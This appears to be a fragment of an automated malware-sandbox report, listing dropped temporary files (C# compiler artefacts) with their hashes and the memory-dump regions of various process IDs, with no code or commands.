\??\c:\Users\Admin\AppData\Local\Temp\CSCB4FD.tmp
Filesize: 652B
MD5: a6a9bc5c90629873f6650f8135035a37
SHA1: 5c64043a41b3e0bd3bde02c49aa55d99a79fd4ea
SHA256: 6eddfef4f7bba1244f6aa230b6a21488f2aa7a49c7000640f6169abd23f78879
SHA512: 3026a9d77a9b1b7b8f67d76181a76c70f7b846c8cf07006a3df5e1f4aa8ddfd45e04720089cad0cdde582ce4294de152b8511e11882287df0cfd4e745b1b0502
-
\??\c:\Users\Admin\AppData\Local\Temp\d9w9p_jz.0.cs
Filesize: 447B
MD5: 1640a04633fee0dfdc7e22c4f4063bf6
SHA1: 3cb525c47b5dd37f8ee45b034c9452265fba5476
SHA256: 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
SHA512: 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
-
\??\c:\Users\Admin\AppData\Local\Temp\d9w9p_jz.cmdline
Filesize: 309B
MD5: 136d4b826485d0535b756cb2621df964
SHA1: 4d3a9ada2f21d1ab98faf3df0b67ce3f774f4662
SHA256: 1b47e8cee28c96feedf851d1098b9ace0c2947245ef9ee5c5176ed1860281d59
SHA512: 9bdedaaf119938691ef0b2e05a1f05f255f36c3bf8fbf6688e3ce1642af9ddba494b1f21b4ee7cb205aaa98b2d32786c86d9f250763721fc5678bd9dc496fdef
-
memory/328-146-0x0000000000000000-mapping.dmp
-
memory/756-159-0x0000000000000000-mapping.dmp
-
memory/1492-140-0x0000000000000000-mapping.dmp
-
memory/1508-178-0x0000000000000000-mapping.dmp
-
memory/1864-147-0x0000000000000000-mapping.dmp
-
memory/1892-183-0x0000000000000000-mapping.dmp
-
memory/2228-170-0x0000000000000000-mapping.dmp
-
memory/2288-161-0x0000000000000000-mapping.dmp
-
memory/2296-132-0x0000000000000000-mapping.dmp
-
memory/2372-154-0x0000020987740000-0x0000020987780000-memory.dmp
Filesize: 256KB
-
memory/2372-153-0x00000209875C0000-0x00000209875E0000-memory.dmp
Filesize: 128KB
-
memory/2372-150-0x0000000000000000-mapping.dmp
-
memory/2664-149-0x0000000000000000-mapping.dmp
-
memory/2856-155-0x0000000000000000-mapping.dmp
-
memory/3120-167-0x0000000000000000-mapping.dmp
-
memory/3136-156-0x0000000000000000-mapping.dmp
-
memory/3384-131-0x00007FF822220000-0x00007FF822D7D000-memory.dmp
Filesize: 11.4MB
-
memory/3384-130-0x00007FF822D80000-0x00007FF8237B6000-memory.dmp
Filesize: 10.2MB
-
memory/3424-157-0x0000000000000000-mapping.dmp
-
memory/3500-144-0x0000000000000000-mapping.dmp
-
memory/3504-148-0x0000000000000000-mapping.dmp
-
memory/3588-181-0x0000000000000000-mapping.dmp
-
memory/3748-142-0x0000000000000000-mapping.dmp
-
memory/3812-143-0x0000000000000000-mapping.dmp
-
memory/4064-158-0x0000000000000000-mapping.dmp
-
memory/4208-175-0x0000000000000000-mapping.dmp
-
memory/4560-135-0x0000000000000000-mapping.dmp
-
memory/4576-173-0x0000000000000000-mapping.dmp
-
memory/4648-165-0x000001EB65DF0000-0x000001EB65E10000-memory.dmp
Filesize: 128KB
-
memory/4648-166-0x000001EB676B0000-0x000001EB676D0000-memory.dmp
Filesize: 128KB
-
memory/4800-141-0x0000000000000000-mapping.dmp
-
memory/4912-145-0x0000000000000000-mapping.dmp
-
memory/5092-160-0x0000000000000000-mapping.dmp